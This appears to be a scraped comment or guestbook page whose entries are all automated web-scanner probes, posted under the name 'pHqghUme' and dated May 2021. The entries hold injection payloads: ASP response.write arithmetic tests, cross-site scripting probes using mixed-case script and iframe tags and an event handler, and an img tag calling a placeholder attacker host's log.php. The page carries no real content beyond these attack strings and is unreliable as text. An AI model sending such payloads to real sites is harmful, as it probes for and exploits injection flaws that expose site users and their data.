  2021-05-06 09:20:16


  1


 • pHqghUme

  2021-05-06 09:20:16


  response.write(9376896*9816409)


 • pHqghUme

  2021-05-06 09:20:15


  1


 • '+response.write(9281680*9695144)+'

  2021-05-06 09:20:15


  1


 • pHqghUme

  2021-05-06 09:20:15


  1


 • pHqghUme

  2021-05-06 09:20:13


  1


 • response.write(9281680*9695144)

  2021-05-06 09:20:13


  1


 • pHqghUme

  2021-05-06 09:20:12


  1


 • pHqghUme

  2021-05-06 09:20:11


  1


 • pHqghUme

  2021-05-06 09:20:11


  1


 • pHqghUme

  2021-05-06 09:20:10


  1


 • pHqghUme

  2021-05-06 09:20:09


  1


 • pHqghUme

  2021-05-06 09:20:08


  1


 • pHqghUme

  2021-05-06 09:20:03


  1f6kovz4IO


 • 1B30ZVZMKaO

  2021-05-06 09:20:02


  1


 • pHqghUme

  2021-05-06 09:19:58


  1


 • pHqghUme

  2021-05-06 09:19:56


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme

  2021-05-06 04:02:22


  1<ugQgiU<


 • pHqghUme

  2021-05-06 04:02:07


  1<img sRc='http://attacker-9447/log.php?


 • pHqghUme

  2021-05-06 04:01:53


  1<She1W5 x=9432>


 • pHqghUme

  2021-05-06 04:01:41


  1<ifRAme sRc=9850.com></IfRamE>


 • pHqghUme

  2021-05-06 04:01:28


  1<WOXHTT>BZIJR[!+!]</WOXHTT>


 • pHqghUme

  2021-05-06 04:01:17


  1l3MbP <ScRiPt >4ku1(9238)</ScRiPt>


 • pHqghUme<Q5kI5j<

  2021-05-06 04:01:11


  1


 • pHqghUme

  2021-05-06 04:01:05


  1<% contenteditable onresize=4ku1(9587)>